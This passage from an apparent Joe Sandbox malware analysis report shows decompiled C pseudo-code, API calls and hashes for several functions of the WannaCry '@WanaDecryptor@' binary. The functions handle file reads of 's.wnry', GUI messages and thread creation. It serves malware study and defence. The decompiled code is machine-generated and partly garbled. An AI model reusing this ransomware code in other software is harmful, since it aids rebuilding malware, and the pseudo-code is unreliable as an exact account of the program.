                                                      • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$Grow@?$basic_string@Split@?$basic_string@$Eos@?$basic_string@Tidy@?$basic_string@Xran@std@@
                                                      • String ID:
                                                      • API String ID: 2613176527-0
                                                      • Opcode ID: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction ID: fd0731f71cda593906caa3e5dc22cd8926dd74a2c181b66db9bbc309a642df48
                                                      • Opcode Fuzzy Hash: 8ce352b19e6a2730b7c76d5054ffee361a812e6060838c656af55f7e3134e3cb
                                                      • Instruction Fuzzy Hash: 9B41F431300B01CFC720DF19C984AAAFBB6FBC5711B50896EE45A87790DB39A841CB58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00407F80 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 101fileCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 20%
                                                      			E00407F80(void* __ecx) {
				struct _IO_FILE* _t24;
				void* _t30;
				void* _t37;
				void* _t38;
				signed int _t45;
				signed int _t48;
				signed int _t51;
				unsigned int _t53;
				signed int _t54;
				void* _t66;
				struct _IO_FILE* _t76;
				void* _t77;
				void* _t78;
				void* _t79;
				void* _t81;
				void* _t82;
				void* _t84;
				void* _t85;

				_t79 = __ecx;
				 *((char*)(_t81 + 0xc)) = 0;
				memset(_t81 + 0xd, 0, 0xc << 2);
				_t82 = _t81 + 0xc;
				asm("stosb");
				 *((intOrPtr*)(_t82 + 0x40)) = 0;
				memset(_t82 + 0x44, 0, 0x21 << 2);
				_t24 = fopen("00000000.res", "rb");
				_t76 = _t24;
				_t84 = _t82 + 0x14;
				_t89 = _t76;
				if(_t76 != 0) {
					fread(_t84 + 0x48, 0x88, 1, _t76);
					fclose(_t76);
					E0040BE90("s.wnry", _t79 + 0x6ea, _t79 + 0x74e);
					_t45 = _t84 + 0x60;
					_push(_t84 + 0x2c);
					_t66 = _t79 + 0x5f0;
					_push("+++");
					_push(_t45);
					_push(_t66);
					_t30 = E0040C4F0(_t38, _t45, _t89);
					_t85 = _t84 + 0x30;
					_t77 = _t30;
					E0040C670();
					_t90 = _t77 - 0xffffffff;
					if(_t77 == 0xffffffff) {
						_push(_t85 + 0xc);
						_push("+++");
						_push(_t85 + 0x40);
						_push(_t66);
						_t37 = E0040C4F0(_t38, _t45, _t90);
						_t85 = _t85 + 0x10;
						_t77 = _t37;
					}
					_t24 = E0040C670();
					if(_t77 == 1) {
						_t24 = 0;
						asm("repne scasb");
						_t48 =  !(_t45 | 0xffffffff) - 1;
						if(_t48 >= 0x1e) {
							asm("repne scasb");
							_t51 =  !(_t48 | 0xffffffff) - 1;
							if(_t51 < 0x32) {
								asm("repne scasb");
								_t53 =  !(_t51 | 0xffffffff);
								_t78 = _t85 + 0xc - _t53;
								_t54 = _t53 >> 2;
								memcpy(_t78 + _t54 + _t54, _t78, memcpy(_t79 + 0x5be, _t78, _t54 << 2) & 0x00000003);
								return E00401A10(_t79 + 0x50c, 0);
							}
						}
					}
				}
				return _t24;
			}





















                                                      0x00407f88
                                                      0x00407f96
                                                      0x00407f9b
                                                      0x00407f9b
                                                      0x00407f9d
                                                      0x00407fa9
                                                      0x00407fbb
                                                      0x00407fbd
                                                      0x00407fc3
                                                      0x00407fc5
                                                      0x00407fc8
                                                      0x00407fca
                                                      0x00407fdd
                                                      0x00407fe4
                                                      0x00407ffd
                                                      0x00408006
                                                      0x0040800a
                                                      0x0040800b
                                                      0x00408011
                                                      0x00408016
                                                      0x00408017
                                                      0x00408018
                                                      0x0040801d
                                                      0x00408020
                                                      0x00408022
                                                      0x00408027
                                                      0x0040802a
                                                      0x00408034
                                                      0x00408035
                                                      0x0040803a
                                                      0x0040803b
                                                      0x0040803c
                                                      0x00408041
                                                      0x00408044
                                                      0x00408044
                                                      0x00408046
                                                      0x0040804e
                                                      0x00408057
                                                      0x00408059
                                                      0x0040805d
                                                      0x00408061
                                                      0x0040806a
                                                      0x0040806e
                                                      0x00408072
                                                      0x0040807b
                                                      0x0040807d
                                                      0x00408089
                                                      0x00408093
                                                      0x004080a0
                                                      0x00000000
                                                      0x004080a7
                                                      0x00408072
                                                      0x00408061
                                                      0x0040804e
                                                      0x004080b3

                                                      APIs
                                                      • fopen.MSVCRT ref: 00407FBD
                                                      • fread.MSVCRT ref: 00407FDD
                                                      • fclose.MSVCRT ref: 00407FE4
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
                                                        • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
                                                        • Part of subcall function 0040C4F0: strncpy.MSVCRT ref: 0040C628
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strncpy$fclosefopenfread
                                                      • String ID: +++$00000000.res$s.wnry
                                                      • API String ID: 3363958884-869915597
                                                      • Opcode ID: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction ID: e8fd78c0316e70a0a3c69cc1eb433b8a063ef73abc5183098f2ea38c2d595da4
                                                      • Opcode Fuzzy Hash: f68bea0f835de8c5134664bc8bdf0f2d83c21063f60135f2f8b7247afbe90d08
                                                      • Instruction Fuzzy Hash: D3313732600604ABD7249620DC05BFF7399EBC1324F404B3EF965B32C1EBBC6A098696
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00403860 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43windowthreadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 68%
                                                      			E00403860(void* __ecx) {
				int _t6;
				long _t7;
				void* _t9;
				void* _t14;

				_t14 = __ecx;
				_t6 = SendMessageA( *(__ecx + 0xc0), 0x147, 0, 0);
				_push(0);
				if(_t6 != 0xffffffff) {
					_t7 = SendMessageA( *(_t14 + 0xc0), 0x150, _t6, ??);
					if(_t7 != 0) {
						SendMessageA( *(_t14 + 0x80), 0x1009, 0, 0);
						_t9 = CreateThread(0, 0, E004038E0, _t14, 0, 0);
						 *(_t14 + 0xf4) = _t9;
						return _t9;
					}
					return _t7;
				} else {
					_push(0);
					_push("Please select a host to decrypt.");
					L00412CC8();
					return _t6;
				}
			}







                                                      0x00403861
                                                      0x0040387a
                                                      0x0040387f
                                                      0x00403881
                                                      0x0040389f
                                                      0x004038a3
                                                      0x004038b5
                                                      0x004038c5
                                                      0x004038cb
                                                      0x00000000
                                                      0x004038cb
                                                      0x004038d3
                                                      0x00403883
                                                      0x00403883
                                                      0x00403885
                                                      0x0040388a
                                                      0x00403891
                                                      0x00403891

                                                      APIs
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040387A
                                                      • #1200.MFC42(Please select a host to decrypt.,00000000,00000000), ref: 0040388A
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 0040389F
                                                      • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 004038B5
                                                      • CreateThread.KERNEL32(00000000,00000000,004038E0,?,00000000,00000000), ref: 004038C5
                                                      Strings
                                                      • Please select a host to decrypt., xrefs: 00403885
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#1200CreateThread
                                                      • String ID: Please select a host to decrypt.
                                                      • API String ID: 3616405048-3459725315
                                                      • Opcode ID: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction ID: 64f0ddf58892c59834d5d68b98c76a24f926c69eeefbcfa1eb30c508a9047c0d
                                                      • Opcode Fuzzy Hash: a539097f114ba3ef4a6e852f645cea6eff0ecd5b8c463f491449578d3e786054
                                                      • Instruction Fuzzy Hash: C4F09032380700BAF2306775AC07FEB2698ABC4F21F25462AF718BA2C0C5F478018668
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004044C0 Relevance: 10.5, APIs: 7, Instructions: 38windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 81%
                                                      			E004044C0(void* __ecx, long _a4) {
				struct tagLOGFONTA _v72;
				long _t10;
				struct HFONT__* _t13;
				struct HWND__* _t15;
				void* _t21;

				_t10 = _a4;
				_t21 = __ecx;
				if(_t10 != 0) {
					L2:
					GetObjectA( *(_t10 + 4), 0x3c,  &(_v72.lfOrientation));
					_v72.lfUnderline = 1;
					_t13 = CreateFontIndirectA( &_v72);
					_push(_t13);
					L00412D5E();
					 *((char*)(_t21 + 0x58)) = 1;
					return _t13;
				}
				_t15 = GetParent( *(__ecx + 0x20));
				_push(_t15);
				L00412DAC();
				_t10 = SendMessageA( *(_t15 + 0x20), 0x31, 0, 0);
				_push(_t10);
				L00412DE2();
				if(_t10 != 0) {
					goto L2;
				}
				return _t10;
			}








                                                      0x004044c0
                                                      0x004044ca
                                                      0x004044cc
                                                      0x004044f8
                                                      0x00404503
                                                      0x0040450d
                                                      0x00404513
                                                      0x00404519
                                                      0x0040451d
                                                      0x00404522
                                                      0x00000000
                                                      0x00404522
                                                      0x004044d2
                                                      0x004044d8
                                                      0x004044d9
                                                      0x004044e8
                                                      0x004044ee
                                                      0x004044ef
                                                      0x004044f6
                                                      0x00000000
                                                      0x00000000
                                                      0x0040452a

                                                      APIs
                                                      • GetParent.USER32(?), ref: 004044D2
                                                      • #2864.MFC42(00000000), ref: 004044D9
                                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004044E8
                                                      • #2860.MFC42(00000000), ref: 004044EF
                                                      • GetObjectA.GDI32(?,0000003C,?), ref: 00404503
                                                      • CreateFontIndirectA.GDI32(?), ref: 00404513
                                                      • #1641.MFC42(00000000), ref: 0040451D
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #1641#2860#2864CreateFontIndirectMessageObjectParentSend
                                                      • String ID:
                                                      • API String ID: 2724197214-0
                                                      • Opcode ID: 0d29f9984c210a8c1ae4b749a0bb5da7fb9748feab07b3c4822df2c82d6e9902
                                                      • Instruction ID: 8763edc8e5a6adeaffa7a86524b671660dad1b09e215c7e2bee76a425fbc91e9
                                                      • Opcode Fuzzy Hash: 0d29f9984c210a8c1ae4b749a0bb5da7fb9748feab07b3c4822df2c82d6e9902
                                                      • Instruction Fuzzy Hash: 5AF0A4B1100340AFD720EB74DE49FDB7BA86F94304F04891DB649DB1A1DAB4E944C769
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0040C060 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 76%
                                                      			E0040C060(void* __ecx, void* __eflags) {
				void* _t35;
				int _t45;
				struct HWND__* _t56;
				signed int _t58;
				int _t59;
				intOrPtr* _t65;
				intOrPtr* _t69;
				intOrPtr* _t70;
				intOrPtr* _t73;
				intOrPtr* _t75;
				struct HWND__* _t87;
				intOrPtr _t92;
				void* _t93;

				_push(0xffffffff);
				_push(E004142BB);
				 *[fs:0x0] = _t92;
				E00413060(0x2408, __ecx,  *[fs:0x0]);
				_push(_t58);
				E0040DBB0(_t92 + 0x18, 0x1000);
				 *(_t92 + 0x241c) = 0;
				_push(_t92 + 0x14);
				_t59 = _t58 | 0xffffffff;
				_t35 = E0040BED0( *((intOrPtr*)(_t92 + 0x2424)),  *((intOrPtr*)(_t92 + 0x2428)), 0xb);
				_t93 = _t92 + 0x10;
				if(_t35 == 0) {
					_t87 =  *(_t93 + 0x2430);
					if(_t87 != 0) {
						SendMessageA(_t87, 0x4e20, 0, 0);
					}
					E0040DD00(_t93 + 0x1c,  *((intOrPtr*)(_t93 + 0x242c)));
					_t65 =  *0x422210; // 0xb828e8
					_push(0);
					_push(E0040DD40(_t93 + 0x1c));
					_push(E0040DD30(_t93 + 0x20));
					_push(7);
					if( *((intOrPtr*)( *_t65 + 0x18))() >= 0) {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0, 0);
						}
						_t69 =  *0x422210; // 0xb828e8
						_push(_t93 + 0x10);
						_push(_t93 + 0x102c);
						 *((intOrPtr*)(_t93 + 0x18)) = 0x13ec;
						_push(_t93 + 0x17);
						if( *((intOrPtr*)( *_t69 + 0x1c))() >= 0) {
							if( *((char*)(_t93 + 0xf)) == 7) {
								_t59 = 0;
							}
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, _t59, 0);
							}
							_t70 =  *0x422210; // 0xb828e8
							 *((intOrPtr*)( *_t70 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							goto L21;
						} else {
							if(_t87 != 0) {
								SendMessageA(_t87, 0x4e22, 0xffffffff, 0);
							}
							_t73 =  *0x422210; // 0xb828e8
							 *((intOrPtr*)( *_t73 + 0xc))();
							 *(_t93 + 0x241c) = 0xffffffff;
							_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
						}
					} else {
						if(_t87 != 0) {
							SendMessageA(_t87, 0x4e21, 0xffffffff, 0);
						}
						_t75 =  *0x422210; // 0xb828e8
						 *((intOrPtr*)( *_t75 + 0xc))();
						 *(_t93 + 0x241c) = 0xffffffff;
						_t45 = E0040DBF0(_t93 + 0x14) | 0xffffffff;
					}
				} else {
					_t56 =  *(_t93 + 0x2430);
					if(_t56 != 0) {
						SendMessageA(_t56, 0x4e20, _t59, 0);
					}
					 *(_t93 + 0x241c) = _t59;
					L21:
					E0040DBF0(_t93 + 0x14);
					_t45 = _t59;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t93 + 0x2414));
				return _t45;
			}
















                                                      0x0040c066
                                                      0x0040c068
                                                      0x0040c073
                                                      0x0040c07a
                                                      0x0040c07f
                                                      0x0040c08b
                                                      0x0040c0a2
                                                      0x0040c0ad
                                                      0x0040c0b2
                                                      0x0040c0b5
                                                      0x0040c0ba
                                                      0x0040c0bf
                                                      0x0040c0e7
                                                      0x0040c0f6
                                                      0x0040c102
                                                      0x0040c102
                                                      0x0040c111
                                                      0x0040c116
                                                      0x0040c11c
                                                      0x0040c129
                                                      0x0040c139
                                                      0x0040c13a
                                                      0x0040c142
                                                      0x0040c17d
                                                      0x0040c189
                                                      0x0040c189
                                                      0x0040c18b
                                                      0x0040c195
                                                      0x0040c19d
                                                      0x0040c19e
                                                      0x0040c1ac
                                                      0x0040c1b2
                                                      0x0040c1ed
                                                      0x0040c1ef
                                                      0x0040c1ef
                                                      0x0040c1f3
                                                      0x0040c1fe
                                                      0x0040c1fe
                                                      0x0040c200
                                                      0x0040c208
                                                      0x0040c20b
                                                      0x00000000
                                                      0x0040c1b4
                                                      0x0040c1b6
                                                      0x0040c1c2
                                                      0x0040c1c2
                                                      0x0040c1c4
                                                      0x0040c1cc
                                                      0x0040c1d3
                                                      0x0040c1e3
                                                      0x0040c1e3
                                                      0x0040c144
                                                      0x0040c146
                                                      0x0040c152
                                                      0x0040c152
                                                      0x0040c154
                                                      0x0040c15c
                                                      0x0040c163
                                                      0x0040c173
                                                      0x0040c173
                                                      0x0040c0c1
                                                      0x0040c0c1
                                                      0x0040c0ca
                                                      0x0040c0d5
                                                      0x0040c0d5
                                                      0x0040c0db
                                                      0x0040c216
                                                      0x0040c21a
                                                      0x0040c21f
                                                      0x0040c21f
                                                      0x0040c22b
                                                      0x0040c238

                                                      APIs
                                                        • Part of subcall function 0040BED0: #823.MFC42(0000002C), ref: 0040BF0C
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
                                                      • SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
                                                      • SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
                                                      • SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
                                                      • SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
                                                      • SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#823
                                                      • String ID:
                                                      • API String ID: 3019263841-0
                                                      • Opcode ID: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction ID: af0acaa543f5011fd428c8da5e8f88cfa40878c60dbd15804793c53c70a14286
                                                      • Opcode Fuzzy Hash: 99a77933eb25dcc6b16ac75c60e27f78d541e8c4006a5acf1c92d05b33b36b85
                                                      • Instruction Fuzzy Hash: 4A41B570644341EBD220DF65CC85F5BB7A8BF84724F104B2DF5247B2D1C7B4A9098BAA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00409C20 Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 77%
                                                      			E00409C20(signed int __eax, intOrPtr* __ecx, intOrPtr _a4) {
				signed int _v0;
				char _v4;
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _t29;
				intOrPtr _t31;
				long _t36;
				intOrPtr _t38;
				intOrPtr* _t41;
				struct HWND__* _t47;
				intOrPtr _t48;
				long _t53;
				struct HWND__* _t58;
				signed int _t60;
				intOrPtr* _t67;
				signed int _t68;

				_t67 = __ecx;
				L00412FE6();
				_t68 = __eax;
				if((__eax & 0x00008000) != 0) {
					_push( &_v8);
					_push( &_v4);
					L00412FFE();
					if(_a4 == 0) {
						_t60 = _v0;
						_t41 = _v16;
					} else {
						_t58 =  *(__ecx + 0x20);
						_t36 = SendMessageA(_t58, 0x408, 0, 0);
						_t41 = _v16;
						_t53 = _t36;
						if(_t53 == _t41) {
							_t38 =  *((intOrPtr*)(_t67 + 0x68));
							_t58 =  *(_t67 + 0x6c);
							if(_t53 - _t38 < _t58) {
								_t53 = _t58 + _t38;
							}
						}
						asm("cdq");
						_t60 = (_v0 ^ _t58) - _t58 + _t53;
					}
					_t47 =  *(_t67 + 0x6c);
					_t29 = _t47 + _t41;
					if(_t60 <= _t29) {
						if(_t60 >= _t41) {
							InvalidateRect( *(_t67 + 0x20), 0, 1);
						}
					} else {
						_t60 = _t60 + _v12 - _t47 - _t41;
						if(_t60 > _t29) {
							_t60 = _t29;
						}
						_push(0);
						if((_t68 & 0x00004000) == 0) {
							_push(0x4000);
							_push(0);
							L00412DDC();
						} else {
							_push(0);
							_push(0x4000);
							L00412DDC();
						}
					}
					_t48 = _v12;
					_t31 = _t60 -  *(_t67 + 0x6c);
					 *((intOrPtr*)(_t67 + 0x68)) = _t31;
					if(_t31 < _t48) {
						 *((intOrPtr*)(_t67 + 0x68)) = _t48;
					}
					 *_v16 =  *((intOrPtr*)( *_t67 + 0xa8))(0x402, _t60, 0);
					return 1;
				} else {
					return 0;
				}
			}




















                                                      0x00409c25
                                                      0x00409c27
                                                      0x00409c2c
                                                      0x00409c34
                                                      0x00409c4a
                                                      0x00409c4b
                                                      0x00409c4e
                                                      0x00409c59
                                                      0x00409c98
                                                      0x00409c9c
                                                      0x00409c5b
                                                      0x00409c5b
                                                      0x00409c68
                                                      0x00409c6e
                                                      0x00409c72
                                                      0x00409c76
                                                      0x00409c78
                                                      0x00409c7b
                                                      0x00409c84
                                                      0x00409c86
                                                      0x00409c86
                                                      0x00409c84
                                                      0x00409c8d
                                                      0x00409c94
                                                      0x00409c94
                                                      0x00409ca0
                                                      0x00409ca3
                                                      0x00409ca8
                                                      0x00409ce6
                                                      0x00409cf0
                                                      0x00409cf0
                                                      0x00409caa
                                                      0x00409cb2
                                                      0x00409cb6
                                                      0x00409cb8
                                                      0x00409cb8
                                                      0x00409cc0
                                                      0x00409cc2
                                                      0x00409cd4
                                                      0x00409cd9
                                                      0x00409cdd
                                                      0x00409cc4
                                                      0x00409cc4
                                                      0x00409cc6
                                                      0x00409ccd
                                                      0x00409ccd
                                                      0x00409cc2
                                                      0x00409cf9
                                                      0x00409cff
                                                      0x00409d03
                                                      0x00409d06
                                                      0x00409d08
                                                      0x00409d08
                                                      0x00409d24
                                                      0x00409d2f
                                                      0x00409c37
                                                      0x00409c3d
                                                      0x00409c3d

                                                      APIs
                                                      • #3797.MFC42 ref: 00409C27
                                                      • #6734.MFC42(?,?), ref: 00409C4E
                                                      • SendMessageA.USER32(?,00000408,00000000,00000000), ref: 00409C68
                                                      • #4284.MFC42(00004000,00000000,00000000,?,?), ref: 00409CCD
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #3797#4284#6734MessageSend
                                                      • String ID:
                                                      • API String ID: 1776784669-0
                                                      • Opcode ID: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction ID: 0f06e6a1ab2a1e1858972f557de936d8f63d8015e647da1bd90f7003a846fc2f
                                                      • Opcode Fuzzy Hash: ed9bba126cbe7da2a4edc66507331a18c8d54c82d452b791da5e82362638f036
                                                      • Instruction Fuzzy Hash: 2F31B0727447019BE724DE28DD81B6B73E1ABC8700F10493EFA86A73C1DA78EC468759
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004127E0 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 71%
                                                      			E004127E0(signed int __ecx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v4;
				intOrPtr* _v16;
				intOrPtr _v24;
				void* __ebx;
				intOrPtr* _t21;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr* _t33;
				signed int _t42;
				unsigned int _t44;
				signed int _t45;
				void* _t53;
				intOrPtr _t65;
				void* _t67;
				intOrPtr _t68;
				void* _t69;

				_push(0xffffffff);
				_push(E0041438B);
				_t21 =  *[fs:0x0];
				_push(_t21);
				 *[fs:0x0] = _t68;
				_push(__ecx);
				_push(0x244);
				L00412CEC();
				_t33 = _t21;
				_t69 = _t68 + 4;
				_v16 = _t33;
				_t53 = 0;
				_v4 = 0;
				if(_t33 == 0) {
					_t33 = 0;
				} else {
					_t65 = _a16;
					 *_t33 = 0;
					 *((intOrPtr*)(_t33 + 4)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x134)) = 0xffffffff;
					 *((intOrPtr*)(_t33 + 0x138)) = 0;
					 *((intOrPtr*)(_t33 + 0x13c)) = 0;
					if(_t65 != 0) {
						asm("repne scasb");
						_t42 =  !(__ecx | 0xffffffff);
						_push(_t42);
						L00412CEC();
						 *((intOrPtr*)(_t33 + 0x138)) = 0;
						asm("repne scasb");
						_t44 =  !(_t42 | 0xffffffff);
						_t67 = _t65 - _t44;
						_t45 = _t44 >> 2;
						memcpy(_t67 + _t45 + _t45, _t67, memcpy(0, _t67, _t45 << 2) & 0x00000003);
						_t69 = _t69 + 0x1c;
						_t53 = 0;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_v4 = 0xffffffff;
				_t23 = E00411C00(_t33);
				 *0x4220dc = _t23;
				if(_t23 == _t53) {
					_push(8);
					L00412CEC();
					 *_t23 = 1;
					 *((intOrPtr*)(_t23 + 4)) = _t33;
					 *[fs:0x0] = _v24;
					return _t23;
				} else {
					if(_t33 != _t53) {
						_t25 =  *((intOrPtr*)(_t33 + 0x138));
						if(_t25 != _t53) {
							_push(_t25);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_t26 =  *((intOrPtr*)(_t33 + 0x13c));
						 *((intOrPtr*)(_t33 + 0x138)) = _t53;
						if(_t26 != _t53) {
							_push(_t26);
							L00412C98();
							_t69 = _t69 + 4;
						}
						_push(_t33);
						 *((intOrPtr*)(_t33 + 0x13c)) = _t53;
						L00412C98();
						_t69 = _t69 + 4;
					}
					 *[fs:0x0] = _v24;
					return 0;
				}
			}




















                                                      0x004127e0
                                                      0x004127e2
                                                      0x004127e7
                                                      0x004127ed
                                                      0x004127ee
                                                      0x004127f5
                                                      0x004127f8
                                                      0x004127fd
                                                      0x00412802
                                                      0x00412804
                                                      0x00412807
                                                      0x0041280b
                                                      0x0041280f
                                                      0x00412813
                                                      0x0041287d
                                                      0x00412815
                                                      0x00412816
                                                      0x0041281c
                                                      0x0041281e
                                                      0x00412825
                                                      0x0041282f
                                                      0x00412835
                                                      0x0041283b
                                                      0x00412844
                                                      0x00412846
                                                      0x00412848
                                                      0x00412849
                                                      0x0041285a
                                                      0x00412860
                                                      0x00412862
                                                      0x00412868
                                                      0x0041286c
                                                      0x00412876
                                                      0x00412876
                                                      0x00412878
                                                      0x00412878
                                                      0x0041287a
                                                      0x0041288b
                                                      0x0041288c
                                                      0x0041288d
                                                      0x00412890
                                                      0x00412898
                                                      0x0041289f
                                                      0x004128a4
                                                      0x004128f8
                                                      0x004128fa
                                                      0x00412906
                                                      0x0041290c
                                                      0x00412911
                                                      0x0041291b
                                                      0x004128a6
                                                      0x004128a8
                                                      0x004128aa
                                                      0x004128b2
                                                      0x004128b4
                                                      0x004128b5
                                                      0x004128ba
                                                      0x004128ba
                                                      0x004128bd
                                                      0x004128c3
                                                      0x004128cb
                                                      0x004128cd
                                                      0x004128ce
                                                      0x004128d3
                                                      0x004128d3
                                                      0x004128d6
                                                      0x004128d7
                                                      0x004128dd
                                                      0x004128e2
                                                      0x004128e2
                                                      0x004128ed
                                                      0x004128f7
                                                      0x004128f7

                                                      APIs
                                                      • #823.MFC42(00000244,?,0019FA30,?,?,0041438B,000000FF,00412933,?,00000000,00000002,?,0040B6CF,?,?), ref: 004127FD
                                                      • #823.MFC42(?,?,?), ref: 00412849
                                                      • #825.MFC42(?), ref: 004128B5
                                                      • #825.MFC42(?), ref: 004128CE
                                                      • #825.MFC42(00000000), ref: 004128DD
                                                      • #823.MFC42(00000008), ref: 004128FA
                                                      Memory Dump Source
